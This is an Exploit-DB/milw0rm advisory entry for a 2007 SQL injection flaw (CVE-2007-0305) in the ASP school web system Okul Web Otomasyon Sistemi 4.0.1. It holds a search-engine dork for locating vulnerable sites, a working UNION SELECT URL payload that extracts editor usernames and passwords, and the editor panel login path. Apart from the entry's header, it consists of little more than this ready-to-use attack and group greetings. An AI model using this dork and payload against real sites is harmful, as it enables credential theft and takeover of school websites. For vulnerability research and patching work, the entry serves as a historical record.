Okul Web Otomasyon Sistemi 4.0.1 - Remote SQL Injection Vulnerability

2007-01-15T00:00:00
ID EDB-ID:3135
Type exploitdb
Reporter ilker Kandemir
Modified 2007-01-15T00:00:00

Description

Okul Web Otomasyon Sistemi 4.0.1 Remote SQL Injection Vulnerability. CVE-2007-0305. Webapps exploit for asp platform

                                        
                                            -------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...

 
Script: Okul Web Otomasyon Sistemi
Script Download: http://www.aspindir.com/Goster/3822
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
 
DORK: inurl:etkinlikbak.asp
-------------------------------------------------------------------------------------------------------------------
Exploit:  etkinlikbak.asp?id=-1%20union%20select%200,editor,sifre,3,4,5%20from%20editor
-------------------------------------------------------------------------------------------------------------------
Editor Panel: editor_gir.asp
-------------------------------------------------------------------------------------------------------------------
 
Tnx:H0tturk,Dr.Max Virus,,PcDelisi,CodeR,Dumenci
Special Tnx:Asianeagle, AYYILDIZ.ORG

# milw0rm.com [2007-01-15]